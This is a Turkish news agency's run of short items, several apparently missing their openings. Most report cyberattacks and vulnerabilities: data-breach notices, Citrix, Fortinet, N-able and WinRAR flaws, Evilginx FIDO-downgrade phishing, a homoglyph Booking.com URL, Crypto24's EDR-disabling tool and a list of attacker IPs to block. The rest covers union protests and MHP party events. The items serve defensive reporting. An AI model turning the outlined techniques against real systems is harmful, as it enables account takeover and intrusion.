Biletal İç ve Dış Ticaret A.Ş., siber saldırı sonucu kişisel verilerin yasa dışı internet platformlarında satışa çıkarıldığını Kişisel Verileri Koruma Kurumu’na (KVKK) bildirdi.

İhlal 11 Ağustos’ta tespit edildi
Açıklamaya göre, Bilgi Teknolojileri ve İletişim Kurumu’ndan (BTK) gelen yazının ardından şirket bilişim ekiplerinin yaptığı inceleme sonucunda ihlal 11 Ağustos 2025 tarihinde tespit edildi.

7 bin 800 müşteri etkilendi
Veri ihlalinden yaklaşık 7 bin 800 kişinin etkilendiği belirtilirken, ihlale konu olan kişisel veriler arasında kimlik, iletişim ve müşteri işlem bilgileri bulunduğu ifade edildi. Etkilenen grubun sadece müşteriler olduğu bildirildi.

KVKK’dan kamuoyuna duyuru kararı
Kişisel Verileri Koruma Kurulu, 14 Ağustos 2025 tarihli ve 2025/1481 sayılı kararıyla ihlalin Kurum internet sitesinde ilan edilmesine karar verdi. Konuya ilişkin inceleme sürüyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Saldırı 25 Mayıs’ta gerçekleşti
Manulaş Manisa Ulaşım Hizmetleri Makina Sanayi ve Ticaret A.Ş., kişisel verileri etkileyen siber saldırıya ilişkin Kişisel Verileri Koruma Kurumu’na (KVKK) bildirimde bulundu. Açıklamaya göre fidye yazılımı saldırısı 25 Mayıs 2025’te meydana geldi ve aynı gün tespit edildi.

1,2 milyon kayıtta risk tespit edildi
Şirket tarafından yapılan bildirimde, 1 milyon 268 bin 222 kayıt üzerinde ihlal gerçekleştiği, sistemde çok sayıda mükerrer veri bulunduğu için gerçek kişi sayısının daha az olabileceği aktarıldı.

Kapsamlı veri grupları etkilendi
Saldırıdan etkilenen kişisel veriler arasında ad, soyad, T.C. kimlik numarası, doğum tarihi, cinsiyet, telefon numarası, e-posta adresi, açık adres, meslek bilgisi, plaka numarası, fotoğraf ve sağlık bilgileri (engellilik durumu ve oranı) yer aldı. Etkilenen grupların aboneler ve üyeler olduğu bildirildi.

İnceleme devam ediyor
Verilerin dışarıya aktarılıp aktarılmadığı henüz tespit edilemezken, Kişisel Verileri Koruma Kurulu’nun 3 Haziran 2025 tarihli ve 2025/999 sayılı kararıyla ihlalin kamuoyuna duyurulması kararlaştırıldı.

Vatandaşların başvuru kanalları
İhlalden etkilenen kişiler, Manulaş’ın web sitesi (https://manulas.com.tr/), 0 236 232 19 00 numaralı telefon hattı veya info@manulas.com.tr e-posta adresi üzerinden bilgi alabilecek.

Kaynak: CUMHA - CUMHUR HABER AJANSI

PowerShell 2.0, 2009’da Windows 7 ile birlikte tanıtılmış ve uzun süre sistem yönetiminde yaygın olarak kullanılmıştı. Ancak güvenlik zafiyetleri, modern özelliklerin eksikliği ve bakım yükü nedeniyle yıllardır sadece “isteğe bağlı özellik” olarak tutuluyordu.

Etkilenen Kullanıcılar
Microsoft, modern sürümler olan PowerShell 5.1 ve PowerShell 7’nin desteğinin devam ettiğini, dolayısıyla çoğu kullanıcı için bir sorun yaşanmayacağını açıkladı. Ancak PowerShell 2.0’a bağımlı eski uygulamalar ve betikler kullanan müşterilerin doğrudan etkileneceği bildirildi.

Şirket, eski Microsoft ürünleri (Exchange, SharePoint, SQL Server gibi) ve bazı üçüncü taraf yazılımların hâlâ PowerShell 2.0’a ihtiyaç duyabileceğini, bu nedenle kullanıcıların sistemlerini uyarlamaları gerektiğini vurguladı.

Geriye Dönük Uyum ve Öneriler
PowerShell 2.0 çalıştırmaya çalışan betikler varsayılan olarak PowerShell 5.1’e yönlendirilecek. Çoğu komut ve modül geriye dönük uyumlulukla çalışsa da Microsoft, kullanıcıların eski betiklerini güncellemeleri ve PowerShell 7’ye geçiş yapmalarını tavsiye ediyor.

Microsoft’un açıklamasında, “Desteklenen ve güncel PowerShell sürümlerini kullanarak betiklerinizin daha güvenli çalışmasını sağlayabilirsiniz. PowerShell 2.0’a bağımlı yazılım ve betiklerinizi güncellemeniz veya geçici çözümlerle uyarlamanız gerekmektedir” ifadeleri yer aldı.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Ne oldu, ne etkiledi
Kurum, kamuya açık bir atıf yapmadı; herhangi bir tehdit grubu işaret edilmedi. Ancak etki alanının genişliği ve hizmet kesintilerinin süresi, fidye yazılımı ihtimalini güçlendirdi. Olay sırasında ofis personelinin çalışmalarını sürdürdüğü ve kesintilerin en aza indirilmesi için yöneticilerle koordinasyon sağlandığı bildirildi.

Olası giriş vektörü
Saldırı vektörü resmen açıklanmadı. Bununla birlikte siber güvenlik uzmanı Kevin Beaumont, yaklaşık bir ay önce Pennsylvania Başsavcılık ağı üzerinde internetten erişilen bazı Citrix NetScaler cihazlarının kritik CVE-2025-5777 (Citrix Bleed 2) açığına karşı savunmasız olduğunu tespit etmişti. Paylaşılan Shodan bulgularına göre iki cihazdan biri 29 Temmuz’dan, diğeri 7 Ağustos’tan bu yana çevrimdışı durumda.

Genişleyen risk tablosu
Shadowserver Foundation, pazartesi günü 3.300’ün üzerinde NetScaler cihazının hâlâ CVE-2025-5777’ye karşı savunmasız olduğunu rapor etti. Hollanda Ulusal Siber Güvenlik Merkezi (NCSC), en az Mayıs başından beri bu açığın sıfır gün olarak kritik kuruluşlara karşı kullanıldığını bildirdi. Hollanda Savcılık Kurumu (Openbaar Ministerie) 18 Temmuz’da e-posta sunucularını etkileyen bir ihlali açıklamıştı.

Resmî uyarılar ve yükümlülükler
CISA, söz konusu Citrix açığını “Bilinen İstismar Edilen Zafiyetler” kataloğuna ekleyerek federal kurumlara acil yama yükümlülüğü getirdi. Kurumlar için öneriler; hızla yamalama, etkilenen cihazların internetten erişimini sınırlama ve olağandışı kimlik doğrulama aktivitelerine karşı izleme olarak sıralanıyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Söz konusu değişim, saldırganların ya aynı altyapıyı kullanarak farklı Fortinet ürünlerini hedef aldığını ya da kullandıkları araçların yeni hedeflere adapte edildiğini gösteriyor. GreyNoise, bu tür saldırıların genellikle yeni güvenlik açıklarının açıklanmasından yaklaşık altı hafta önce tespit edildiğini ve istismar girişimlerinin kısa sürede başlayabileceğini vurguladı.

Tespit Edilen Faaliyetler
GreyNoise’un analizine göre, 3 Ağustos’taki saldırı trafiği daha önce Haziran ayında Pilot Fiber Inc. ile ilişkili bir FortiGate cihazından kaydedilen etkinliklerle benzerlik gösterdi. Bu durum, aynı araçların veya altyapının tekrar kullanım ihtimaline işaret ediyor.

5 Ağustos’tan itibaren ise trafik SSL VPN yerine FortiManager’a yöneldi. GreyNoise, bunun sadece araştırmacıların yaptığı geniş kapsamlı taramalardan farklı olduğunu, doğrudan yetkisiz erişim denemelerine işaret eden kaba kuvvet saldırıları olduğunu belirtti.

Engellenmesi Gereken IP Adresleri
Rapor kapsamında aşağıdaki IP adresleri saldırılarla ilişkilendirildi ve güvenlik duvarlarında engellenmesi tavsiye edildi:

• 31.206.51.194

• 23.120.100.230

• 96.67.212.83

• 104.129.137.162

• 118.97.151.34

• 180.254.147.16

• 20.207.197.237

• 180.254.155.227

• 185.77.225.174

• 45.227.254.113

Uzmanlardan Uyarılar
GreyNoise, yöneticilere Fortinet cihazlarında oturum açma korumalarını güçlendirmeleri, dış erişimleri yalnızca güvenilir IP aralıkları ve VPN üzerinden sınırlamaları çağrısında bulundu.

Siber güvenlik uzmanları, kaba kuvvet saldırılarındaki bu artışın, Fortinet ürünlerinde henüz açıklanmamış sıfır gün açıklarının duyurulmadan önce test edilmesi ihtimaline dikkat çekiyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Saldırının İşleyişi
Araştırmacılar, Evilginx adlı AiTM (adversary-in-the-middle) çerçevesine özel bir “phishlet” ekleyerek Safari’nin Windows sürümünü taklit eden bir kullanıcı aracısı oluşturdu. Bu tarayıcı FIDO tabanlı kimlik doğrulamasını desteklemediği için Microsoft Entra ID, kullanıcıya hata mesajı gösteriyor ve alternatif yöntemler (Microsoft Authenticator uygulaması, SMS kodu, OTP vb.) sunuyor.

Kullanıcı bu yöntemlerden biriyle giriş yaptığında, saldırı platformu hem kullanıcı adı/parolayı hem de çok faktörlü doğrulama (MFA) tokenini veya oturum çerezini ele geçiriyor. Bu çerez saldırganın tarayıcısına aktarıldığında, kurbanın hesabına tam erişim sağlanabiliyor.

Henüz Saldırılarda Görülmedi
Proofpoint, yöntemin şu ana kadar gerçek saldırılarda kullanılmadığını ancak özellikle yüksek değerli hedeflere yönelik operasyonlarda ciddi risk oluşturduğunu belirtti.

Microsoft, araştırma hakkında yaptığı açıklamada bunun bir ürün açığı olmadığını, sosyal mühendislik yoluyla gerçekleştirilen bir oltalama tekniği olduğunu vurguladı. Şirket, kullanıcıların kimlik doğrulama gücü politikalarıyla daha güçlü yöntemleri zorunlu hale getirmesini ve şüpheli bağlantılara tıklamaktan kaçınmasını önerdi.

Önlemler
Uzmanlar, kullanıcıların beklenmedik şekilde alternatif kimlik doğrulama seçenekleriyle karşılaşmaları halinde işlemi durdurmaları gerektiğini söylüyor. Ayrıca, fallback doğrulama yöntemlerinin kapatılması veya ek güvenlik kontrollerinin devreye alınması öneriliyor.

Geçtiğimiz ay farklı bir FIDO zayıflatma saldırısı da rapor edilmişti. Expel araştırmacıları tarafından geliştirilen “PoisonSeed” adlı yöntemde kullanıcılar sahte bir QR kod aracılığıyla kandırılmaya çalışılmış, ancak pratikte saldırı başarısız olmuştu.

Kaynak: CUMHA - CUMHUR HABER AJANSI

FortiSIEM; kamu kurumları, büyük ölçekli işletmeler, finans kuruluşları, sağlık sektörü ve yönetilen güvenlik hizmet sağlayıcıları (MSSP) tarafından yaygın olarak kullanılıyor. Açığın etki alanı 5.4 sürümünden 7.3 sürümüne kadar uzanıyor.

Fortinet’ten Kritik Uyarı
Fortinet, açığın aktif olarak kullanıldığını doğruladı. Açıklamada, “Bu güvenlik açığı için pratik istismar kodunun dolaşımda olduğu tespit edilmiştir” ifadesine yer verildi. Ayrıca istismarın cihazda ayırt edici bir gösterge (IOC) bırakmadığı, dolayısıyla tespitinin zor olduğu belirtildi.

Şirket, güvenlik güncellemesi yayımlanan sürümlere acilen geçilmesi gerektiğini bildirdi:

• FortiSIEM 7.3.2

• FortiSIEM 7.2.6

• FortiSIEM 7.1.8

• FortiSIEM 7.0.4

• FortiSIEM 6.7.10

5.4 ile 6.6 arasındaki eski sürümler için yama yayımlanmayacağı, bu sürümlerin kullanıcılarının desteklenen sürümlere geçmesi gerektiği açıklandı.

Geçici Çözüm ve Önlemler
Fortinet, phMonitor bileşeninin 7900 numaralı portuna erişimi kısıtlamanın geçici bir önlem olabileceğini bildirdi. Ancak bunun yalnızca saldırı yüzeyini daralttığı, açığın kendisini ortadan kaldırmadığı vurgulandı.

Açıklama, GreyNoise’un bu ayın başında Fortinet SSL VPN’lerine yönelik kaba kuvvet saldırılarında büyük artış gözlemlendiğini ve daha sonra FortiManager’a yönelim olduğunu rapor etmesinin hemen ardından geldi. Güvenlik uzmanları bu tür trafik artışlarının çoğu zaman yeni bir güvenlik açığının habercisi olabileceğini ifade ediyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

CISA’nın açıklamasına göre, CVE-2025-8875 olarak izlenen açık güvenliksiz serileştirme üzerinden komut çalıştırmaya, CVE-2025-8876 ise kullanıcı girdisinin hatalı filtrelenmesiyle komut enjeksiyonuna olanak tanıyor.

N-able’dan Açıklama ve Yama
N-able, açıkların istismar edildiğini doğrulayarak güvenlik güncellemelerinin N-central 2025.3.1 sürümüyle yayımlandığını bildirdi. Şirket, saldırıların sınırlı sayıda on-premises ortamda gözlemlendiğini, ancak bulut tabanlı sistemlerde bir bulguya rastlanmadığını açıkladı.

Şirketin duyurusunda, “On-premises N-central kullananların vakit kaybetmeden 2025.3.1 sürümüne yükseltmesi gerekmektedir. Güvenlik politikamız gereği CVE ayrıntıları güncellemeden üç hafta sonra paylaşılacaktır” ifadelerine yer verildi.

Federal Kurumlara Son Tarih 20 Ağustos
CISA, söz konusu açıkları “Bilinen İstismar Edilen Açıklar Kataloğu”na ekleyerek Federal Civilian Executive Branch kurumlarının 20 Ağustos’a kadar sistemlerini yamalamasını zorunlu kıldı. 2021’de yürürlüğe giren Bağlayıcı Operasyonel Direktif (BOD) 22-01 çerçevesinde belirlenen süreye uymayan kurumlar ciddi risklerle karşı karşıya kalabilecek.

Shodan verilerine göre, çevrimiçi olarak erişilebilir yaklaşık 2.000 N-able N-central örneği bulunuyor. Bunların büyük kısmı ABD, Avustralya ve Almanya’da yer alıyor.

CISA ayrıca özel sektör dahil tüm kuruluşlara da güncellemeleri önceliklendirmeleri yönünde çağrı yaptı. Açıklamada, “Bu tür açıklar kötü niyetli aktörler için sık kullanılan saldırı vektörleri olup federal ağlar için ciddi riskler oluşturmaktadır” denildi.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Söz konusu saldırıda, Microsoft yazılımlarında bulunan güvenlik açığının istismar edilerek Avam Kamarası bilgisayar ve mobil cihazlarını yöneten bir veritabanına sızıldığı belirtildi. Saldırı sırasında çalışanlara ait kamuya açık olmayan veriler de çalındı. Bu veriler arasında isimler, görev unvanları, ofis konumları ve e-posta adresleri yer alıyor.

Dolandırıcılık Uyarısı
Avam Kamarası üyeleri ve çalışanları, çalınan verilerin kimlik sahteciliği ya da dolandırıcılık amaçlı kullanılabileceği konusunda uyarıldı.

Kanada İletişim Güvenliği Kurumu’na (CSE) bağlı Kanada Siber Güvenlik Merkezi (Cyber Centre), soruşturmaya destek verdiğini açıkladı. Kurum tarafından yapılan açıklamada, saldırının belirli bir tehdit grubu veya devlet destekli aktörlerle ilişkilendirilmediği, siber olaylarda failleri tespit etmenin zaman ve kaynak gerektirdiği vurgulandı.

Microsoft Açıkları Ön Planda
Her ne kadar saldırıda kullanılan açık hakkında resmi açıklama yapılmasa da, Kanada Siber Merkezi kısa süre önce iki Microsoft güvenlik açığı konusunda ülke genelinde uyarıda bulunmuştu. Bunlardan biri SharePoint Server’daki CVE-2025-53770 (ToolShell) olarak bilinen açık, diğeri ise Exchange sunucularını etkileyen CVE-2025-53786.

ToolShell açığı Temmuz ayından bu yana Çin destekli gruplar ve fidye yazılım çeteleri tarafından aktif olarak kullanılıyor. Bu açık aracılığıyla ABD Ulusal Nükleer Güvenlik İdaresi, Eğitim Bakanlığı, Florida Gelir İdaresi, Rhode Island Genel Meclisi ve Avrupa ile Orta Doğu’daki bazı devlet kurumlarının hedef alındığı biliniyor.

CVE-2025-53786 ise Microsoft Exchange ortamlarında saldırganlara ağ içinde yatay hareket etme imkânı tanıyor. ABD Siber Güvenlik ve Altyapı Güvenliği Ajansı (CISA) geçtiğimiz hafta bu açık için acil direktif yayımlamıştı.

Güvenlik uzmanları, Kanada’daki kurumların vakit kaybetmeden sistemlerini güncellemeleri gerektiğini, aksi halde benzer saldırılarla karşı karşıya kalınabileceğini belirtiyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

İlk bakışta Booking.com’un resmi adreslerine benziyormuş gibi görünen bu bağlantılar, kullanıcıları sahte alan adlarına yönlendiriyor. Örneğin, “https://account.booking.comんdetailんrestric-access.www-account-booking.com/en/” şeklinde görünen link, aslında www-account-booking[.]com adlı sahte bir domaine ait.

Zararlı Yazılım Dağıtımı
Kullanıcılar bu bağlantıya tıkladığında zararlı bir MSI dosyası indirilerek bilgisayara yükleniyor. Güvenlik araştırmaları, indirilen dosyanın bilgi hırsızları veya uzaktan erişim trojanları gibi ek kötü amaçlı yazılımlar kurmak için kullanıldığını ortaya koydu.

Bu yöntem, “homoglif” olarak adlandırılan, birbirine çok benzeyen ancak farklı alfabelere ait karakterleri kullanarak yapılan oltalama saldırılarının bir örneği. Benzer teknikler daha önce de Cyrillic ve Latin harfleriyle görülmüştü.

Intuit Kullanıcıları da Hedefte
BleepingComputer tarafından bildirilen ayrı bir saldırıda ise Intuit kullanıcıları hedef alındı. Bu kampanyada “intuit.com” gibi görünen sahte alan adları aslında “Lntuit.com” şeklinde kayıtlı. Küçük harf kullanıldığında “L” harfinin “i” harfine çok benzemesi, kullanıcıların sahte bağlantıyı fark etmesini zorlaştırıyor.

E-postalarda yer alan “Hesabımı doğrula” bağlantısına tıklayan kullanıcılar sahte sitelere yönlendirilirken, bağlantı doğrudan açıldığında ise gerçek Intuit giriş sayfasına geri yönlendiriliyor. Bu yöntemle saldırganların özellikle mobil kullanıcıları hedef aldığı düşünülüyor.

Daha Önce de Booking.com Hedef Alındı
Booking.com markası daha önce de oltalama saldırılarında kullanıldı. 2023’te otel müşterilerinin sahte sitelere yönlendirilerek kredi kartı bilgilerinin çalındığı, 2025’in Mart ayında ise Microsoft’un, konaklama sektörü çalışanlarını hedef alan başka bir oltalama kampanyası konusunda uyarı yaptığı biliniyor.

Uzmanlar, kullanıcıların bağlantılara tıklamadan önce alan adlarını dikkatle incelemesi ve güncel güvenlik yazılımları kullanması gerektiğini belirtiyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

PST Başkanı Beate Gangås, Arendal kentinde düzenlenen Arendalsuka ulusal forumunda yaptığı açıklamada olayın doğrudan zarar vermekten çok, Rusya’nın siber yeteneklerini sergilemeye yönelik olduğunu belirtti. Gangås, “Amaçları yıkım yaratmak değil, neler yapabileceklerini göstermek” ifadelerini kullandı. Ayrıca bu tür eylemlerin toplumda korku ve huzursuzluk yaratmayı hedeflediğini vurguladı.

Dört Saatlik Müdahale
Yerel basına göre baraj operatörleri yaklaşık dört saat içinde saldırıyı fark ederek vanaları yeniden kapattı. Bu süre zarfında 7,2 milyon litreden fazla su tahliye oldu.

Haziran ayında Norveç Ulusal Kriminal Soruşturma Servisi (Kripos) de benzer bir sonuca ulaştı. Rus hacker grupları saldırıyı doğrulamak için Telegram üzerinden üç dakikalık bir video yayımladı. Videoda barajın kontrol paneli ve pro-Rus bir siber grubun işaretleri yer aldı.

Rusya ile İlişkilendirilen İkinci Saldırı
Bu olay, Norveç’te Rusya bağlantılı ikinci büyük siber saldırı olarak kayıtlara geçti. Daha önce ülkenin devlet hizmetlerine yönelik geniş çaplı bir DDoS saldırısı düzenlenmişti.

Norveç İstihbarat Şefi Nils Andreas Stensønes, Rusya’nın Batı’ya karşı hibrit saldırılarla gerilimi artırdığını belirterek, “Norveç savaşta değil, ancak Rusya öngörülemez bir komşu ve en büyük tehdit konumunda” dedi.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Grubun en erken faaliyetleri 2024 yılının Eylül ayında rapor edilmiş olsa da, saldırılar son dönemde daha gelişmiş yöntemlerle yürütülmeye başlandı. Araştırmacılar, kullanılan teknikler ve araçlar nedeniyle grubun eski fidye yazılım oluşumlarının üyelerinden oluşabileceğini değerlendiriyor.

Saldırı Yöntemleri
Saldırılar, Windows sistemlerinde yönetici hesaplarının etkinleştirilmesi veya yeni yerel hesapların oluşturulmasıyla başlıyor. Daha sonra saldırganlar, sistemde keşif faaliyetleri gerçekleştirerek donanım bilgilerini ve kullanıcı hesaplarını topluyor. Bu süreçte zararlı hizmetler ve görevler tanımlanıyor.

Trend Micro’nun raporuna göre, kullanılan yöntemlerden biri WinMainSvc adlı keylogger hizmeti, diğeri ise MSRuntime adı verilen fidye yazılım yükleyicisi.

EDR Sistemlerini Devre Dışı Bırakan Araç
Crypto24’ün dikkat çeken yöntemlerinden biri, RealBlindingEDR adlı açık kaynak kodlu aracın özelleştirilmiş bir versiyonunun kullanılması. Bu araç, Trend Micro, Kaspersky, Sophos, SentinelOne, Malwarebytes, McAfee, Cisco ve Fortinet gibi birçok güvenlik yazılımını hedef alarak çekirdek düzeyinde devre dışı bırakabiliyor.

Trend Micro ürünlerine yönelik olarak ise saldırganların XBCUninstaller.exe aracını kötüye kullandığı belirtildi. Normal şartlarda sistem sorunlarını gidermek için kullanılan bu araç, saldırı sırasında güvenlik ajanlarını kaldırmak amacıyla çalıştırıldı.

Veri Hırsızlığı ve Şifreleme Süreci
Saldırılar sırasında “Microsoft Help Manager” adıyla gizlenen keylogger aktif pencere başlıklarını ve tuş vuruşlarını kaydediyor. Ayrıca saldırganlar SMB paylaşımları üzerinden ağda yayılım sağlıyor ve çalınan verileri özel bir araçla Google Drive’a aktarıyor.

Son aşamada ise sistemlerdeki gölge kopyalar silinerek fidye yazılımı devreye sokuluyor. Trend Micro, şifreleme yöntemleri veya fidye notları hakkında ayrıntılı bilgi paylaşmazken, savunma ekiplerine yönelik göstergeler listesi yayımladı.

Kaynak: CUMHA - CUMHUR HABER AJANSI

İZBAN seferleri iptal edildi
Ulaştırma hizmet kolunda çalışanların katılımıyla yapılan iş bırakma eylemi, İzmir’de banliyö ulaşımını durdurdu. İZBAN, bugün için planlanan seferlerini iptal ettiğini duyurdu.

TCDD seferlerinde aksama yaşandı
Eylem kapsamında TCDD Taşımacılık bünyesindeki bazı şehirlerde tren seferleri de iptal edildi. Aydın, Denizli, Zonguldak ve Karabük’te planlanan seferler gerçekleştirilemedi.

Memur-Sen, iş bırakma kararını kamu görevlilerinin taleplerini duyurmak ve toplu sözleşme sürecinde hak ettikleri ücretleri elde etmek amacıyla aldığını açıkladı.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Sağlık-Sen, Kamu İşveren Heyeti’nin memurlara sunduğu zam teklifini protesto etmek amacıyla 16 Ağustos 2025 Cumartesi günü Çalışma ve Sosyal Güvenlik Bakanlığı önünde eylem düzenledi. Saat 17.00’de başlayan eylemde, taban aylıklara yapılması planlanan 1000 TL zammın yetersizliği vurgulandı.

"1000 TL ile alınabilen ürünler ortada"
Sağlık-Sen Genel Başkanı Mahmut Faruk Doğan, yaptığı açıklamada, "Kamu işveren heyetinin taban aylığa önerdiği 1000 TL ile neler alınabileceğini göstermek için alışveriş yaptık. 5 litre zeytinyağı, ayçiçek yağı, 2 kilo şeker, 1 kilo un, 30’lu yumurta ve 1 kilo çay aldık. Bunların toplamı 1065 TL tuttu. Bu miktar, dört kişilik bir ailenin mutfağına dahi yetmiyor" dedi.

"Gerçek enflasyon çarşıda, pazarda görülmeli"
Doğan, teklifin kabul edilemez olduğunu belirterek, "Çarşıya pazara çıkın ve gerçek enflasyonu görün. Masa başında hazırlanan rakamlarla değil, vatandaşın yaşadığı gerçek fiyatlarla müzakere edilmeli. Alım gücü her geçen gün eriyor, sabit ücretler mutfakta tükeniyor" ifadelerini kullandı.

Müzakereler devam ediyor
Toplu sözleşme görüşmelerinin sürdüğünü aktaran Doğan, sağlık ve sosyal hizmet çalışanları için 77 ayrı talep sunduklarını ifade etti. Bu talepler arasında hekim, hemşire, paramedik, eczacı ve sosyal hizmet uzmanı gibi meslek gruplarına yönelik düzenlemelerin yer aldığını vurguladı. Doğan, "Özellikle acil sağlık çalışanları ve hemşireler afetlerde, kazalarda fedakârca görev yapıyor. Onların emeğinin karşılığını almak için mücadele ediyoruz" dedi.

Doğan ayrıca, pazartesi günü Tandoğan Meydanı’nda Memur-Sen tarafından düzenlenecek mitinge de katılım çağrısı yaptı.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Milliyetçi Hareket Partisi (MHP) İstanbul İl Başkanlığı’nın ev sahipliğinde düzenlenen “Asırlık Birlik, Sonsuz Kardeşlik – Terörsüz Türkiye İçin Millî Birlik ve Dayanışma Buluşmaları” İstanbul’da yoğun katılımla gerçekleştirildi.

Divan heyeti güçlü isimlerden oluştu
Toplantının divan başkanlığını Türkiye Büyük Millet Meclisi Başkanvekili Celal Adan üstlendi. Divan üyeleri arasında MHP Genel Başkan Yardımcıları Feti Yıldız ve İzzet Faruk Aksu ile Sakarya Milletvekili Muhammed Levent Bülbül yer aldı.

Genel merkezden üst düzey katılım
Toplantıya MHP Genel Başkan Yardımcıları Semih Yalçın ve Ulvi Yönter’in yanı sıra TBMM İdari Amiri Sermet Atay ve çok sayıda milletvekili katıldı. Belediye başkanları, MYK ve MDK üyeleri de buluşmada yer aldı.

Teşkilatlar ve sivil toplum temsil edildi
İl ve ilçe teşkilatları, Ülkü Ocakları yöneticileri, Kadın Aile Çocuk ve Engelliler Politikaları (KAÇEP) temsilcileri, şehit ve gazi aileleri ile sivil toplum kuruluşları da toplantıya katılım gösterdi.

Konuşmalarda terörsüz Türkiye vurgusu yapıldı
Katılımcılar, konuşmalarında Türkiye’nin terörden arındırılmış bir geleceğe ulaşması için verilen mücadelenin önemine dikkat çekti. MHP’nin terörle mücadeledeki tavizsiz tutumu hatırlatılarak, millî birlik ve kardeşlik ruhunun korunması gerektiği ifade edildi.

MHP İstanbul İl Başkanlığı’ndan açıklama
Toplantı sonrasında yapılan açıklamada, programa katılan genel başkan yardımcılarına, milletvekillerine, belediye başkanlarına, teşkilat mensuplarına, Ülkü Ocakları yöneticilerine, KAÇEP üyelerine, şehit ve gazi ailelerine ve sivil toplum kuruluşlarına teşekkür edildi.

İstanbul’da düzenlenen buluşma, millî birlik ve dayanışma ruhunun vurgulandığı önemli bir etkinlik olarak kayıtlara geçti.

Kaynak: CUMHA - CUMHUR HABER AJANSI

İl Başkan Yardımcıları Halil Tufan ve Oğuzhan Alp, görsel, dijital ve işitsel medya temsilcileriyle bir araya gelerek etkinlik hakkında bilgi verdi. Yapılan açıklamada buluşmanın, farklı kesimleri aynı masa etrafında birleştirmeyi hedeflediği belirtildi.

MHP İl Başkan Yardımcıları, basının milli birlik mesajlarının geniş kitlelere ulaşmasında kritik bir rol üstlendiğini vurguladı. Açıklamada, “Millî Birlik ve Dayanışma Buluşmaları, sadece bir siyasi etkinlik değil; Türkiye’nin geleceğine dair ortak bir irade beyanıdır. Teröre karşı tek ses, tek yürek olmak için tüm vatandaşlarımızın olduğu gibi, kamuoyunu bilgilendiren basın temsilcilerimizin de desteğini önemsiyoruz.” ifadeleri yer aldı.

MHP İstanbul İl Başkanlığı’nın ev sahipliğinde gerçekleşecek buluşmada, milli değerler, kardeşlik, birlik ve terörle mücadelede toplumsal dayanışma başlıkları ele alınacak.

Kaynak: CUMHA - CUMHUR HABER AJANSI

MHP Genel Başkan Yardımcısı ve İstanbul Milletvekili İsmail Faruk Aksu, MHP 3. Bölge Başkanı Ali Aydın ve MHP Esenyurt İlçe Başkanı Metin Yazar, ilçedeki sivil toplum kuruluşlarının temsilcilerini yemekli programa davet etti.

Birlik ve beraberlik vurgusu
Programda STK’ların görüş ve önerilerinin alınması, teröre karşı ortak bir duruş sergilenmesi ve toplumsal dayanışmanın güçlendirilmesi amaçlanıyor.

MHP Genel Başkan Yardımcısı İsmail Faruk Aksu, davet kapsamında yaptığı açıklamada, “Türkiye’nin birlik ve beraberliği, milletimizin kardeşliği her türlü ayrıştırıcı unsura karşı en güçlü cevabımızdır. Millî Birlik ve Dayanışma Buluşmalarımız, bu ruhun ve bu iradenin en güzel yansımalarından biridir. Esenyurt’ta STK temsilcilerimizle bir araya gelerek ortak hedeflerimiz doğrultusunda kenetlenmeye devam edeceğiz” ifadelerini kullandı.

STK’lara davet
MHP Esenyurt İlçe Başkanı Metin Yazar ise, “Esenyurt’ta faaliyet gösteren tüm STK’larımızı bu anlamlı buluşmaya davet ediyoruz. Birlik ve beraberliğimizin güçlenmesi, toplumsal dayanışmamızın artması için bu programın önemli bir fırsat olduğuna inanıyoruz” dedi.

Yemekli buluşmanın, siyasi bir toplantı olmanın ötesinde, toplumsal dayanışma, kardeşlik ve ortak mücadele ruhunu pekiştiren bir etkinlik olacağı belirtildi.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Dizin geçişi (directory traversal) hatasından kaynaklanan bu açık, özel hazırlanmış RAR arşivlerinin, kullanıcı tarafından belirtilen dizin yerine saldırganın tanımladığı bir konuma dosya çıkartmasına izin veriyor. Bu yöntemle, zararlı çalıştırılabilir dosyalar Windows’un başlangıç klasörlerine (%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup veya %ProgramData%\Microsoft\Windows\Start Menu\Programs\StartUp) yerleştirilebiliyor. Kullanıcı bir sonraki oturum açtığında, bu dosyalar otomatik olarak çalışarak saldırgana sistem üzerinde uzaktan kod çalıştırma imkânı sağlıyor.

ESET, saldırılarda hedefli oltalama e-postalarıyla gönderilen RAR dosyalarının bu açığı kullanarak RomCom arka kapı zararlı yazılımını yüklediğini belirledi. RomCom (Storm-0978, Tropical Scorpius veya UNC2596 olarak da bilinir) Rusya bağlantılı bir tehdit grubu olup fidye yazılımı, veri hırsızlığı ve kimlik bilgisi toplama kampanyalarıyla tanınıyor. Grup daha önce Cuba ve Industrial Spy fidye yazılım operasyonlarıyla ilişkilendirilmişti.

WinRAR otomatik güncelleme özelliği sunmadığından, tüm kullanıcıların win-rar.com adresinden en son sürümü manuel olarak indirmesi öneriliyor. ESET, açığın istismarına dair detaylı bir raporu daha sonra yayımlayacağını açıkladı.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Google’ın açıklamasına göre, ihlal edilen sistemde işletme adları, iletişim bilgileri ve ilgili notlar bulunuyordu. Erişim, sınırlı bir zaman diliminde sağlandıktan sonra engellendi. Şirket, verilerin çoğunun zaten kamuya açık olabilecek temel iş bilgileri olduğunu vurguladı.

ShinyHunters grubu, saldırılarda çalışanları hedef alan sesli kimlik avı (vishing) ve sosyal mühendislik yöntemleriyle Salesforce hesaplarına erişim sağlıyor. Bu yöntemle müşteri veritabanlarını indirip şirketlerden fidye talep ediyor. Grup, fidye ödemeyen şirketlerin verilerini sızdırma veya satma tehdidinde bulunuyor.

BleepingComputer’a konuşan ShinyHunters, birçok Salesforce ortamını ihlal ettiklerini ve saldırıların hâlen devam ettiğini doğruladı. Grup, bazı şirketleri e-posta yoluyla şantaj yaparken, bir şirketin verilerini sızdırmamak için 4 Bitcoin (yaklaşık 400 bin dolar) ödediği öğrenildi.

